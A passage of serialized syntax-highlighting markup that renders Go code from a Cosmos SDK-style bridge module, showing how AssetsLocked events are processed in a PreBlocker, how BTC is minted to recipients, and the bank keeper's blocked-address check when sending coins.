",{"type":24,"tag":301,"props":88400,"children":88401},{"style":385},[88402],{"type":30,"value":772},{"type":24,"tag":301,"props":88404,"children":88405},{"style":10246},[88406],{"type":30,"value":88407},"PreBlockHandler",{"type":24,"tag":301,"props":88409,"children":88410},{"style":359},[88411],{"type":30,"value":911},{"type":24,"tag":301,"props":88413,"children":88414},{"style":314},[88415],{"type":30,"value":88108},{"type":24,"tag":301,"props":88417,"children":88418},{"style":359},[88419],{"type":30,"value":20835},{"type":24,"tag":301,"props":88421,"children":88422},{"style":10246},[88423],{"type":30,"value":85442},{"type":24,"tag":301,"props":88425,"children":88426},{"style":359},[88427],{"type":30,"value":206},{"type":24,"tag":301,"props":88429,"children":88430},{"style":10246},[88431],{"type":30,"value":88108},{"type":24,"tag":301,"props":88433,"children":88434},{"style":359},[88435],{"type":30,"value":3035},{"type":24,"tag":301,"props":88437,"children":88438},{"class":303,"line":320},[88439,88443,88447],{"type":24,"tag":301,"props":88440,"children":88441},{"style":308},[88442],{"type":30,"value":680},{"type":24,"tag":301,"props":88444,"children":88445},{"style":348},[88446],{"type":30,"value":86721},{"type":24,"tag":301,"props":88448,"children":88449},{"style":359},[88450],{"type":30,"value":1707},{"type":24,"tag":301,"props":88452,"children":88453},{"class":303,"line":335},[88454,88458,88462,88466,88470],{"type":24,"tag":301,"props":88455,"children":88456},{"style":369},[88457],{"type":30,"value":32942},{"type":24,"tag":301,"props":88459,"children":88460},{"style":10246},[88461],{"type":30,"value":85353},{"type":24,"tag":301,"props":88463,"children":88464},{"style":359},[88465],{"type":30,"value":206},{"type":24,"tag":301,"props":88467,"children":88468},{"style":10246},[88469],{"type":30,"value":83062},{"type":24,"tag":301,"props":88471,"children":88472},{"style":359},[88473],{"type":30,"value":1729},{"type":24,"tag":301,"props":88475,"children":88476},{"class":303,"line":344},[88477,88482,88486,88491,88495,88500],{"type":24,"tag":301,"props":88478,"children":88479},{"style":369},[88480],{"type":30,"value":88481}," req",{"type":24,"tag":301,"props":88483,"children":88484},{"style":385},[88485],{"type":30,"value":431},{"type":24,"tag":301,"props":88487,"children":88488},{"style":10246},[88489],{"type":30,"value":88490},"cmtabci",{"type":24,"tag":301,"props":88492,"children":88493},{"style":359},[88494],{"type":30,"value":206},{"type":24,"tag":301,"props":88496,"children":88497},{"style":10246},[88498],{"type":30,"value":88499},"RequestFinalizeBlock",{"type":24,"tag":301,"props":88501,"children":88502},{"style":359},[88503],{"type":30,"value":1729},{"type":24,"tag":301,"props":88505,"children":88506},{"class":303,"line":401},[88507,88511,88515,88519,88523,88528,88532,88536],{"type":24,"tag":301,"props":88508,"children":88509},{"style":359},[88510],{"type":30,"value":86789},{"type":24,"tag":301,"props":88512,"children":88513},{"style":385},[88514],{"type":30,"value":772},{"type":24,"tag":301,"props":88516,"children":88517},{"style":10246},[88518],{"type":30,"value":85442},{"type":24,"tag":301,"props":88520,"children":88521},{"style":359},[88522],{"type":30,"value":206},{"type":24,"tag":301,"props":88524,"children":88525},{"style":10246},[88526],{"type":30,"value":88527},"ResponsePreBlock",{"type":24,"tag":301,"props":88529,"children":88530},{"style":359},[88531],{"type":30,"value":377},{"type":24,"tag":301,"props":88533,"children":88534},{"style":10246},[88535],{"type":30,"value":21654},{"type":24,"tag":301,"props":88537,"children":88538},{"style":359},[88539],{"type":30,"value":398},{"type":24,"tag":301,"props":88541,"children":88542},{"class":303,"line":415},[88543],{"type":24,"tag":301,"props":88544,"children":88545},{"style":385},[88546],{"type":30,"value":88547}," ...\n",{"type":24,"tag":301,"props":88549,"children":88550},{"class":303,"line":439},[88551,88556,88560,88565,88569,88574,88578,88583,88587,88591,88595,88600],{"type":24,"tag":301,"props":88552,"children":88553},{"style":369},[88554],{"type":30,"value":88555}," err",{"type":24,"tag":301,"props":88557,"children":88558},{"style":385},[88559],{"type":30,"value":83129},{"type":24,"tag":301,"props":88561,"children":88562},{"style":369},[88563],{"type":30,"value":88564}," pbh",{"type":24,"tag":301,"props":88566,"children":88567},{"style":359},[88568],{"type":30,"value":206},{"type":24,"tag":301,"props":88570,"children":88571},{"style":369},[88572],{"type":30,"value":88573},"bridgeKeeper",{"type":24,"tag":301,"props":88575,"children":88576},{"style":359},[88577],{"type":30,"value":206},{"type":24,"tag":301,"props":88579,"children":88580},{"style":314},[88581],{"type":30,"value":88582},"AcceptAssetsLocked",{"type":24,"tag":301,"props":88584,"children":88585},{"style":359},[88586],{"type":30,"value":362},{"type":24,"tag":301,"props":88588,"children":88589},{"style":369},[88590],{"type":30,"value":27051},{"type":24,"tag":301,"props":88592,"children":88593},{"style":359},[88594],{"type":30,"value":377},{"type":24,"tag":301,"props":88596,"children":88597},{"style":369},[88598],{"type":30,"value":88599},"events",{"type":24,"tag":301,"props":88601,"children":88602},{"style":359},[88603],{"type":30,"value":791},{"type":24,"tag":301,"props":88605,"children":88606},{"class":303,"line":447},[88607,88611,88615,88619,88624],{"type":24,"tag":301,"props":88608,"children":88609},{"style":308},[88610],{"type":30,"value":3285},{"type":24,"tag":301,"props":88612,"children":88613},{"style":369},[88614],{"type":30,"value":55255},{"type":24,"tag":301,"props":88616,"children":88617},{"style":385},[88618],{"type":30,"value":71098},{"type":24,"tag":301,"props":88620,"children":88621},{"style":348},[88622],{"type":30,"value":88623}," nil",{"type":24,"tag":301,"props":88625,"children":88626},{"style":359},[88627],{"type":30,"value":3035},{"type":24,"tag":301,"props":88629,"children":88630},{"class":303,"line":476},[88631,88635,88639,88643,88648,88652,88657,88661,88666,88670,88674],{"type":24,"tag":301,"props":88632,"children":88633},{"style":308},[88634],{"type":30,"value":85788},{"type":24,"tag":301,"props":88636,"children":88637},{"style":348},[88638],{"type":30,"value":88623},{"type":24,"tag":301,"props":88640,"children":88641},{"style":359},[88642],{"type":30,"value":377},{"type":24,"tag":301,"props":88644,"children":88645},{"style":369},[88646],{"type":30,"value":88647},"fmt",{"type":24,"tag":301,"props":88649,"children":88650},{"style":359},[88651],{"type":30,"value":206},{"type":24,"tag":301,"props":88653,"children":88654},{"style":314},[88655],{"type":30,"value":88656},"Errorf",{"type":24,"tag":301,"props":88658,"children":88659},{"style":359},[88660],{"type":30,"value":362},{"type":24,"tag":301,"props":88662,"children":88663},{"style":329},[88664],{"type":30,"value":88665},"\"cannot accept AssetsLocked events: %w\"",{"type":24,"tag":301,"props":88667,"children":88668},{"style":359},[88669],{"type":30,"value":377},{"type":24,"tag":301,"props":88671,"children":88672},{"style":369},[88673],{"type":30,"value":55155},{"type":24,"tag":301,"props":88675,"children":88676},{"style":359},[88677],{"type":30,"value":791},{"type":24,"tag":301,"props":88679,"children":88680},{"class":303,"line":495},[88681],{"type":24,"tag":301,"props":88682,"children":88683},{"style":359},[88684],{"type":30,"value":3345},{"type":24,"tag":301,"props":88686,"children":88687},{"class":303,"line":504},[88688],{"type":24,"tag":301,"props":88689,"children":88690},{"style":385},[88691],{"type":30,"value":88547},{"type":24,"tag":301,"props":88693,"children":88694},{"class":303,"line":512},[88695],{"type":24,"tag":301,"props":88696,"children":88697},{"style":359},[88698],{"type":30,"value":501},{"type":24,"tag":301,"props":88700,"children":88701},{"class":303,"line":592},[88702],{"type":24,"tag":301,"props":88703,"children":88704},{"style":359},[88705],{"type":30,"value":698},{"type":24,"tag":301,"props":88707,"children":88708},{"class":303,"line":619},[88709],{"type":24,"tag":301,"props":88710,"children":88711},{"emptyLinePlaceholder":16},[88712],{"type":30,"value":341},{"type":24,"tag":301,"props":88714,"children":88715},{"class":303,"line":635},[88716,88720,88724,88728,88732,88736,88740],{"type":24,"tag":301,"props":88717,"children":88718},{"style":348},[88719],{"type":30,"value":83013},{"type":24,"tag":301,"props":88721,"children":88722},{"style":359},[88723],{"type":30,"value":873},{"type":24,"tag":301,"props":88725,"children":88726},{"style":369},[88727],{"type":30,"value":87833},{"type":24,"tag":301,"props":88729,"children":88730},{"style":10246},[88731],{"type":30,"value":86657},{"type":24,"tag":301,"props":88733,"children":88734},{"style":359},[88735],{"type":30,"value":911},{"type":24,"tag":301,"props":88737,"children":88738},{"style":314},[88739],{"type":30,"value":88582},{"type":24,"tag":301,"props":88741,"children":88742},{"style":359},[88743],{"type":30,"value":1707},{"type":24,"tag":301,"props":88745,"children":88746},{"class":303,"line":643},[88747,88751,88755,88759,88763],{"type":24,"tag":301,"props":88748,"children":88749},{"style":369},[88750],{"type":30,"value":26994},{"type":24,"tag":301,"props":88752,"children":88753},{"style":10246},[88754],{"type":30,"value":85353},{"type":24,"tag":301,"props":88756,"children":88757},{"style":359},[88758],{"type":30,"value":206},{"type":24,"tag":301,"props":88760,"children":88761},{"style":10246},[88762],{"type":30,"value":83062},{"type":24,"tag":301,"props":88764,"children":88765},{"style":359},[88766],{"type":30,"value":1729},{"type":24,"tag":301,"props":88768,"children":88769},{"class":303,"line":652},[88770,88775,88779,88783,88788],{"type":24,"tag":301,"props":88771,"children":88772},{"style":369},[88773],{"type":30,"value":88774}," events",{"type":24,"tag":301,"props":88776,"children":88777},{"style":10246},[88778],{"type":30,"value":84887},{"type":24,"tag":301,"props":88780,"children":88781},{"style":359},[88782],{"type":30,"value":206},{"type":24,"tag":301,"props":88784,"children":88785},{"style":10246},[88786],{"type":30,"value":88787},"AssetsLockedEvents",{"type":24,"tag":301,"props":88789,"children":88790},{"style":359},[88791],{"type":30,"value":1729},{"type":24,"tag":301,"props":88793,"children":88794},{"class":303,"line":666},[88795,88799,88803],{"type":24,"tag":301,"props":88796,"children":88797},{"style":359},[88798],{"type":30,"value":911},{"type":24,"tag":301,"props":88800,"children":88801},{"style":10246},[88802],{"type":30,"value":21654},{"type":24,"tag":301,"props":88804,"children":88805},{"style":359},[88806],{"type":30,"value":3035},{"type":24,"tag":301,"props":88808,"children":88809},{"class":303,"line":674},[88810],{"type":24,"tag":301,"props":88811,"children":88812},{"style":385},[88813],{"type":30,"value":27110},{"type":24,"tag":301,"props":88815,"children":88816},{"class":303,"line":692},[88817,88821,88825,88829,88834,88838,88842,88847],{"type":24,"tag":301,"props":88818,"children":88819},{"style":308},[88820],{"type":30,"value":3249},{"type":24,"tag":301,"props":88822,"children":88823},{"style":369},[88824],{"type":30,"value":9873},{"type":24,"tag":301,"props":88826,"children":88827},{"style":359},[88828],{"type":30,"value":377},{"type":24,"tag":301,"props":88830,"children":88831},{"style":369},[88832],{"type":30,"value":88833},"event",{"type":24,"tag":301,"props":88835,"children":88836},{"style":385},[88837],{"type":30,"value":83129},{"type":24,"tag":301,"props":88839,"children":88840},{"style":308},[88841],{"type":30,"value":84111},{"type":24,"tag":301,"props":88843,"children":88844},{"style":369},[88845],{"type":30,"value":88846}," events",{"type":24,"tag":301,"props":88848,"children":88849},{"style":359},[88850],{"type":30,"value":3035},{"type":24,"tag":301,"props":88852,"children":88853},{"class":303,"line":3631},[88854,88859,88863,88867,88871,88875,88879,88884,88888,88892,88896,88901],{"type":24,"tag":301,"props":88855,"children":88856},{"style":369},[88857],{"type":30,"value":88858}," recipient",{"type":24,"tag":301,"props":88860,"children":88861},{"style":359},[88862],{"type":30,"value":377},{"type":24,"tag":301,"props":88864,"children":88865},{"style":369},[88866],{"type":30,"value":55155},{"type":24,"tag":301,"props":88868,"children":88869},{"style":385},[88870],{"type":30,"value":83129},{"type":24,"tag":301,"props":88872,"children":88873},{"style":369},[88874],{"type":30,"value":85353},{"type":24,"tag":301,"props":88876,"children":88877},{"style":359},[88878],{"type":30,"value":206},{"type":24,"tag":301,"props":88880,"children":88881},{"style":314},[88882],{"type":30,"value":88883},"AccAddressFromBech32",{"type":24,"tag":301,"props":88885,"children":88886},{"style":359},[88887],{"type":30,"value":362},{"type":24,"tag":301,"props":88889,"children":88890},{"style":369},[88891],{"type":30,"value":88833},{"type":24,"tag":301,"props":88893,"children":88894},{"style":359},[88895],{"type":30,"value":206},{"type":24,"tag":301,"props":88897,"children":88898},{"style":369},[88899],{"type":30,"value":88900},"Recipient",{"type":24,"tag":301,"props":88902,"children":88903},{"style":359},[88904],{"type":30,"value":791},{"type":24,"tag":301,"props":88906,"children":88907},{"class":303,"line":3639},[88908,88912,88916,88920,88924],{"type":24,"tag":301,"props":88909,"children":88910},{"style":308},[88911],{"type":30,"value":3285},{"type":24,"tag":301,"props":88913,"children":88914},{"style":369},[88915],{"type":30,"value":55255},{"type":24,"tag":301,"props":88917,"children":88918},{"style":385},[88919],{"type":30,"value":71098},{"type":24,"tag":301,"props":88921,"children":88922},{"style":348},[88923],{"type":30,"value":88623},{"type":24,"tag":301,"props":88925,"children":88926},{"style":359},[88927],{"type":30,"value":3035},{"type":24,"tag":301,"props":88929,"children":88930},{"class":303,"line":3647},[88931,88935,88940,88944,88948,88952,88957,88961,88965],{"type":24,"tag":301,"props":88932,"children":88933},{"style":308},[88934],{"type":30,"value":85788},{"type":24,"tag":301,"props":88936,"children":88937},{"style":369},[88938],{"type":30,"value":88939}," fmt",{"type":24,"tag":301,"props":88941,"children":88942},{"style":359},[88943],{"type":30,"value":206},{"type":24,"tag":301,"props":88945,"children":88946},{"style":314},[88947],{"type":30,"value":88656},{"type":24,"tag":301,"props":88949,"children":88950},{"style":359},[88951],{"type":30,"value":362},{"type":24,"tag":301,"props":88953,"children":88954},{"style":329},[88955],{"type":30,"value":88956},"\"failed to parse recipient address: %w\"",{"type":24,"tag":301,"props":88958,"children":88959},{"style":359},[88960],{"type":30,"value":377},{"type":24,"tag":301,"props":88962,"children":88963},{"style":369},[88964],{"type":30,"value":55155},{"type":24,"tag":301,"props":88966,"children":88967},{"style":359},[88968],{"type":30,"value":791},{"type":24,"tag":301,"props":88970,"children":88971},{"class":303,"line":3685},[88972],{"type":24,"tag":301,"props":88973,"children":88974},{"style":359},[88975],{"type":30,"value":3345},{"type":24,"tag":301,"props":88977,"children":88978},{"class":303,"line":3713},[88979],{"type":24,"tag":301,"props":88980,"children":88981},{"emptyLinePlaceholder":16},[88982],{"type":30,"value":341},{"type":24,"tag":301,"props":88984,"children":88985},{"class":303,"line":3721},[88986,88990,88995,88999,89004,89008,89012,89016,89021,89025,89030],{"type":24,"tag":301,"props":88987,"children":88988},{"style":308},[88989],{"type":30,"value":3285},{"type":24,"tag":301,"props":88991,"children":88992},{"style":369},[88993],{"type":30,"value":88994}," bytes",{"type":24,"tag":301,"props":88996,"children":88997},{"style":359},[88998],{"type":30,"value":206},{"type":24,"tag":301,"props":89000,"children":89001},{"style":314},[89002],{"type":30,"value":89003},"Equal",{"type":24,"tag":301,"props":89005,"children":89006},{"style":359},[89007],{"type":30,"value":362},{"type":24,"tag":301,"props":89009,"children":89010},{"style":369},[89011],{"type":30,"value":88833},{"type":24,"tag":301,"props":89013,"children":89014},{"style":359},[89015],{"type":30,"value":206},{"type":24,"tag":301,"props":89017,"children":89018},{"style":314},[89019],{"type":30,"value":89020},"TokenBytes",{"type":24,"tag":301,"props":89022,"children":89023},{"style":359},[89024],{"type":30,"value":25153},{"type":24,"tag":301,"props":89026,"children":89027},{"style":369},[89028],{"type":30,"value":89029},"sourceBTCToken",{"type":24,"tag":301,"props":89031,"children":89032},{"style":359},[89033],{"type":30,"value":398},{"type":24,"tag":301,"props":89035,"children":89036},{"class":303,"line":3751},[89037,89042,89046,89050,89054,89059,89063,89067,89071,89075,89079,89083,89087,89091],{"type":24,"tag":301,"props":89038,"children":89039},{"style":369},[89040],{"type":30,"value":89041}," err",{"type":24,"tag":301,"props":89043,"children":89044},{"style":385},[89045],{"type":30,"value":2537},{"type":24,"tag":301,"props":89047,"children":89048},{"style":369},[89049],{"type":30,"value":87961},{"type":24,"tag":301,"props":89051,"children":89052},{"style":359},[89053],{"type":30,"value":206},{"type":24,"tag":301,"props":89055,"children":89056},{"style":314},[89057],{"type":30,"value":89058},"mintBTC",{"type":24,"tag":301,"props":89060,"children":89061},{"style":359},[89062],{"type":30,"value":362},{"type":24,"tag":301,"props":89064,"children":89065},{"style":369},[89066],{"type":30,"value":27051},{"type":24,"tag":301,"props":89068,"children":89069},{"style":359},[89070],{"type":30,"value":377},{"type":24,"tag":301,"props":89072,"children":89073},{"style":369},[89074],{"type":30,"value":88356},{"type":24,"tag":301,"props":89076,"children":89077},{"style":359},[89078],{"type":30,"value":377},{"type":24,"tag":301,"props":89080,"children":89081},{"style":369},[89082],{"type":30,"value":88833},{"type":24,"tag":301,"props":89084,"children":89085},{"style":359},[89086],{"type":30,"value":206},{"type":24,"tag":301,"props":89088,"children":89089},{"style":369},[89090],{"type":30,"value":85767},{"type":24,"tag":301,"props":89092,"children":89093},{"style":359},[89094],{"type":30,"value":791},{"type":24,"tag":301,"props":89096,"children":89097},{"class":303,"line":3782},[89098,89102,89106,89110,89114],{"type":24,"tag":301,"props":89099,"children":89100},{"style":308},[89101],{"type":30,"value":65516},{"type":24,"tag":301,"props":89103,"children":89104},{"style":369},[89105],{"type":30,"value":55255},{"type":24,"tag":301,"props":89107,"children":89108},{"style":385},[89109],{"type":30,"value":71098},{"type":24,"tag":301,"props":89111,"children":89112},{"style":348},[89113],{"type":30,"value":88623},{"type":24,"tag":301,"props":89115,"children":89116},{"style":359},[89117],{"type":30,"value":3035},{"type":24,"tag":301,"props":89119,"children":89120},{"class":303,"line":3791},[89121,89125,89129,89133,89137],{"type":24,"tag":301,"props":89122,"children":89123},{"style":308},[89124],{"type":30,"value":67441},{"type":24,"tag":301,"props":89126,"children":89127},{"style":369},[89128],{"type":30,"value":88939},{"type":24,"tag":301,"props":89130,"children":89131},{"style":359},[89132],{"type":30,"value":206},{"type":24,"tag":301,"props":89134,"children":89135},{"style":314},[89136],{"type":30,"value":88656},{"type":24,"tag":301,"props":89138,"children":89139},{"style":359},[89140],{"type":30,"value":1707},{"type":24,"tag":301,"props":89142,"children":89143},{"class":303,"line":3819},[89144,89149],{"type":24,"tag":301,"props":89145,"children":89146},{"style":329},[89147],{"type":30,"value":89148}," \"failed to mint BTC for event %v: %w\"",{"type":24,"tag":301,"props":89150,"children":89151},{"style":359},[89152],{"type":30,"value":1729},{"type":24,"tag":301,"props":89154,"children":89155},{"class":303,"line":4397},[89156,89161,89165,89170],{"type":24,"tag":301,"props":89157,"children":89158},{"style":369},[89159],{"type":30,"value":89160}," event",{"type":24,"tag":301,"props":89162,"children":89163},{"style":359},[89164],{"type":30,"value":206},{"type":24,"tag":301,"props":89166,"children":89167},{"style":369},[89168],{"type":30,"value":89169},"Sequence",{"type":24,"tag":301,"props":89171,"children":89172},{"style":359},[89173],{"type":30,"value":1729},{"type":24,"tag":301,"props":89175,"children":89176},{"class":303,"line":4405},[89177,89182],{"type":24,"tag":301,"props":89178,"children":89179},{"style":369},[89180],{"type":30,"value":89181}," err",{"type":24,"tag":301,"props":89183,"children":89184},{"style":359},[89185],{"type":30,"value":1729},{"type":24,"tag":301,"props":89187,"children":89188},{"class":303,"line":4422},[89189],{"type":24,"tag":301,"props":89190,"children":89191},{"style":359},[89192],{"type":30,"value":89193}," )\n",{"type":24,"tag":301,"props":89195,"children":89196},{"class":303,"line":4438},[89197],{"type":24,"tag":301,"props":89198,"children":89199},{"style":359},[89200],{"type":30,"value":65600},{"type":24,"tag":301,"props":89202,"children":89203},{"class":303,"line":4446},[89204,89208,89212],{"type":24,"tag":301,"props":89205,"children":89206},{"style":359},[89207],{"type":30,"value":10139},{"type":24,"tag":301,"props":89209,"children":89210},{"style":308},[89211],{"type":30,"value":10144},{"type":24,"tag":301,"props":89213,"children":89214},{"style":359},[89215],{"type":30,"value":3035},{"type":24,"tag":301,"props":89217,"children":89218},{"class":303,"line":4506},[89219],{"type":24,"tag":301,"props":89220,"children":89221},{"style":385},[89222],{"type":30,"value":89223}," ...\n",{"type":24,"tag":301,"props":89225,"children":89226},{"class":303,"line":4566},[89227],{"type":24,"tag":301,"props":89228,"children":89229},{"style":359},[89230],{"type":30,"value":3345},{"type":24,"tag":301,"props":89232,"children":89233},{"class":303,"line":4574},[89234],{"type":24,"tag":301,"props":89235,"children":89236},{"style":359},[89237],{"type":30,"value":501},{"type":24,"tag":301,"props":89239,"children":89240},{"class":303,"line":4590},[89241],{"type":24,"tag":301,"props":89242,"children":89243},{"style":385},[89244],{"type":30,"value":27110},{"type":24,"tag":301,"props":89246,"children":89247},{"class":303,"line":4599},[89248],{"type":24,"tag":301,"props":89249,"children":89250},{"style":359},[89251],{"type":30,"value":698},{"type":24,"tag":301,"props":89253,"children":89254},{"class":303,"line":4629},[89255],{"type":24,"tag":301,"props":89256,"children":89257},{"emptyLinePlaceholder":16},[89258],{"type":30,"value":341},{"type":24,"tag":301,"props":89260,"children":89261},{"class":303,"line":4659},[89262,89266,89270,89274,89278,89282,89286],{"type":24,"tag":301,"props":89263,"children":89264},{"style":348},[89265],{"type":30,"value":83013},{"type":24,"tag":301,"props":89267,"children":89268},{"style":359},[89269],{"type":30,"value":873},{"type":24,"tag":301,"props":89271,"children":89272},{"style":369},[89273],{"type":30,"value":87833},{"type":24,"tag":301,"props":89275,"children":89276},{"style":10246},[89277],{"type":30,"value":86657},{"type":24,"tag":301,"props":89279,"children":89280},{"style":359},[89281],{"type":30,"value":911},{"type":24,"tag":301,"props":89283,"children":89284},{"style":314},[89285],{"type":30,"value":89058},{"type":24,"tag":301,"props":89287,"children":89288},{"style":359},[89289],{"type":30,"value":1707},{"type":24,"tag":301,"props":89291,"children":89292},{"class":303,"line":4668},[89293,89297,89301,89305,89309],{"type":24,"tag":301,"props":89294,"children":89295},{"style":369},[89296],{"type":30,"value":26994},{"type":24,"tag":301,"props":89298,"children":89299},{"style":10246},[89300],{"type":30,"value":85353},{"type":24,"tag":301,"props":89302,"children":89303},{"style":359},[89304],{"type":30,"value":206},{"type":24,"tag":301,"props":89306,"children":89307},{"style":10246},[89308],{"type":30,"value":83062},{"type":24,"tag":301,"props":89310,"children":89311},{"style":359},[89312],{"type":30,"value":1729},{"type":24,"tag":301,"props":89314,"children":89315},{"class":303,"line":4677},[89316,89321,89325,89329,89334],{"type":24,"tag":301,"props":89317,"children":89318},{"style":369},[89319],{"type":30,"value":89320}," recipient",{"type":24,"tag":301,"props":89322,"children":89323},{"style":10246},[89324],{"type":30,"value":85353},{"type":24,"tag":301,"props":89326,"children":89327},{"style":359},[89328],{"type":30,"value":206},{"type":24,"tag":301,"props":89330,"children":89331},{"style":10246},[89332],{"type":30,"value":89333},"AccAddress",{"type":24,"tag":301,"props":89335,"children":89336},{"style":359},[89337],{"type":30,"value":1729},{"type":24,"tag":301,"props":89339,"children":89340},{"class":303,"line":4697},[89341,89345,89350,89354,89359],{"type":24,"tag":301,"props":89342,"children":89343},{"style":369},[89344],{"type":30,"value":68295},{"type":24,"tag":301,"props":89346,"children":89347},{"style":10246},[89348],{"type":30,"value":89349}," math",{"type":24,"tag":301,"props":89351,"children":89352},{"style":359},[89353],{"type":30,"value":206},{"type":24,"tag":301,"props":89355,"children":89356},{"style":10246},[89357],{"type":30,"value":89358},"Int",{"type":24,"tag":301,"props":89360,"children":89361},{"style":359},[89362],{"type":30,"value":1729},{"type":24,"tag":301,"props":89364,"children":89365},{"class":303,"line":4725},[89366,89370,89374],{"type":24,"tag":301,"props":89367,"children":89368},{"style":359},[89369],{"type":30,"value":911},{"type":24,"tag":301,"props":89371,"children":89372},{"style":10246},[89373],{"type":30,"value":21654},{"type":24,"tag":301,"props":89375,"children":89376},{"style":359},[89377],{"type":30,"value":3035},{"type":24,"tag":301,"props":89379,"children":89380},{"class":303,"line":4733},[89381],{"type":24,"tag":301,"props":89382,"children":89383},{"style":385},[89384],{"type":30,"value":27110},{"type":24,"tag":301,"props":89386,"children":89387},{"class":303,"line":4741},[89388,89393,89397,89401,89405,89410,89414,89418],{"type":24,"tag":301,"props":89389,"children":89390},{"style":369},[89391],{"type":30,"value":89392}," err",{"type":24,"tag":301,"props":89394,"children":89395},{"style":385},[89396],{"type":30,"value":2537},{"type":24,"tag":301,"props":89398,"children":89399},{"style":369},[89400],{"type":30,"value":87961},{"type":24,"tag":301,"props":89402,"children":89403},{"style":359},[89404],{"type":30,"value":206},{"type":24,"tag":301,"props":89406,"children":89407},{"style":369},[89408],{"type":30,"value":89409},"bankKeeper",{"type":24,"tag":301,"props":89411,"children":89412},{"style":359},[89413],{"type":30,"value":206},{"type":24,"tag":301,"props":89415,"children":89416},{"style":314},[89417],{"type":30,"value":88348},{"type":24,"tag":301,"props":89419,"children":89420},{"style":359},[89421],{"type":30,"value":1707},{"type":24,"tag":301,"props":89423,"children":89424},{"class":303,"line":4757},[89425,89429],{"type":24,"tag":301,"props":89426,"children":89427},{"style":369},[89428],{"type":30,"value":32942},{"type":24,"tag":301,"props":89430,"children":89431},{"style":359},[89432],{"type":30,"value":1729},{"type":24,"tag":301,"props":89434,"children":89435},{"class":303,"line":4765},[89436,89441,89445,89450],{"type":24,"tag":301,"props":89437,"children":89438},{"style":369},[89439],{"type":30,"value":89440}," types",{"type":24,"tag":301,"props":89442,"children":89443},{"style":359},[89444],{"type":30,"value":206},{"type":24,"tag":301,"props":89446,"children":89447},{"style":369},[89448],{"type":30,"value":89449},"ModuleName",{"type":24,"tag":301,"props":89451,"children":89452},{"style":359},[89453],{"type":30,"value":1729},{"type":24,"tag":301,"props":89455,"children":89456},{"class":303,"line":4773},[89457,89461],{"type":24,"tag":301,"props":89458,"children":89459},{"style":369},[89460],{"type":30,"value":88858},{"type":24,"tag":301,"props":89462,"children":89463},{"style":359},[89464],{"type":30,"value":1729},{"type":24,"tag":301,"props":89466,"children":89467},{"class":303,"line":4781},[89468,89473],{"type":24,"tag":301,"props":89469,"children":89470},{"style":369},[89471],{"type":30,"value":89472}," coins",{"type":24,"tag":301,"props":89474,"children":89475},{"style":359},[89476],{"type":30,"value":1729},{"type":24,"tag":301,"props":89478,"children":89479},{"class":303,"line":4789},[89480],{"type":24,"tag":301,"props":89481,"children":89482},{"style":359},[89483],{"type":30,"value":30677},{"type":24,"tag":301,"props":89485,"children":89486},{"class":303,"line":4848},[89487,89491,89495,89499,89503],{"type":24,"tag":301,"props":89488,"children":89489},{"style":308},[89490],{"type":30,"value":453},{"type":24,"tag":301,"props":89492,"children":89493},{"style":369},[89494],{"type":30,"value":55255},{"type":24,"tag":301,"props":89496,"children":89497},{"style":385},[89498],{"type":30,"value":71098},{"type":24,"tag":301,"props":89500,"children":89501},{"style":348},[89502],{"type":30,"value":88623},{"type":24,"tag":301,"props":89504,"children":89505},{"style":359},[89506],{"type":30,"value":3035},{"type":24,"tag":301,"props":89508,"children":89509},{"class":303,"line":4862},[89510,89514,89518,89522,89526,89530,89535,89539,89543],{"type":24,"tag":301,"props":89511,"children":89512},{"style":308},[89513],{"type":30,"value":482},{"type":24,"tag":301,"props":89515,"children":89516},{"style":369},[89517],{"type":30,"value":88939},{"type":24,"tag":301,"props":89519,"children":89520},{"style":359},[89521],{"type":30,"value":206},{"type":24,"tag":301,"props":89523,"children":89524},{"style":314},[89525],{"type":30,"value":88656},{"type":24,"tag":301,"props":89527,"children":89528},{"style":359},[89529],{"type":30,"value":362},{"type":24,"tag":301,"props":89531,"children":89532},{"style":329},[89533],{"type":30,"value":89534},"\"failed to send coins: %w\"",{"type":24,"tag":301,"props":89536,"children":89537},{"style":359},[89538],{"type":30,"value":377},{"type":24,"tag":301,"props":89540,"children":89541},{"style":369},[89542],{"type":30,"value":55155},{"type":24,"tag":301,"props":89544,"children":89545},{"style":359},[89546],{"type":30,"value":791},{"type":24,"tag":301,"props":89548,"children":89549},{"class":303,"line":4871},[89550],{"type":24,"tag":301,"props":89551,"children":89552},{"style":359},[89553],{"type":30,"value":501},{"type":24,"tag":301,"props":89555,"children":89556},{"class":303,"line":4879},[89557],{"type":24,"tag":301,"props":89558,"children":89559},{"style":385},[89560],{"type":30,"value":27110},{"type":24,"tag":301,"props":89562,"children":89563},{"class":303,"line":4942},[89564],{"type":24,"tag":301,"props":89565,"children":89566},{"style":359},[89567],{"type":30,"value":698},{"type":24,"tag":291,"props":89569,"children":89571},{"code":89570,"language":82877,"meta":7,"className":82878,"style":7},"func (k BaseKeeper) SendCoinsFromModuleToAccount(\n ctx context.Context, senderModule string, recipientAddr sdk.AccAddress, amt sdk.Coins,\n) error {\n ...\n if k.BlockedAddr(recipientAddr) {\n return errorsmod.Wrapf(sdkerrors.ErrUnauthorized, \"%s is not allowed to receive funds\", recipientAddr)\n }\n ...\n}\n",[89572],{"type":24,"tag":145,"props":89573,"children":89574},{"__ignoreMap":7},[89575,89607,89686,89701,89709,89740,89798,89805,89812],{"type":24,"tag":301,"props":89576,"children":89577},{"class":303,"line":304},[89578,89582,89586,89590,89595,89599,89603],{"type":24,"tag":301,"props":89579,"children":89580},{"style":348},[89581],{"type":30,"value":83013},{"type":24,"tag":301,"props":89583,"children":89584},{"style":359},[89585],{"type":30,"value":873},{"type":24,"tag":301,"props":89587,"children":89588},{"style":369},[89589],{"type":30,"value":87833},{"type":24,"tag":301,"props":89591,"children":89592},{"style":10246},[89593],{"type":30,"value":89594},"BaseKeeper",{"type":24,"tag":301,"props":89596,"children":89597},{"style":359},[89598],{"type":30,"value":911},{"type":24,"tag":301,"props":89600,"children":89601},{"style":314},[89602],{"type":30,"value":88348},{"type":24,"tag":301,"props":89604,"children":89605},{"style":359},[89606],{"type":30,"value":1707},{"type":24,"tag":301,"props":89608,"children":89609},{"class":303,"line":320},[89610,89614,89618,89622,89626,89630,89635,89639,89643,89648,89652,89656,89660,89664,89669,89673,89677,89682],{"type":24,"tag":301,"props":89611,"children":89612},{"style":369},[89613],{"type":30,"value":32599},{"type":24,"tag":301,"props":89615,"children":89616},{"style":10246},[89617],{"type":30,"value":83053},{"type":24,"tag":301,"props":89619,"children":89620},{"style":359},[89621],{"type":30,"value":206},{"type":24,"tag":301,"props":89623,"children":89624},{"style":10246},[89625],{"type":30,"value":83062},{"type":24,"tag":3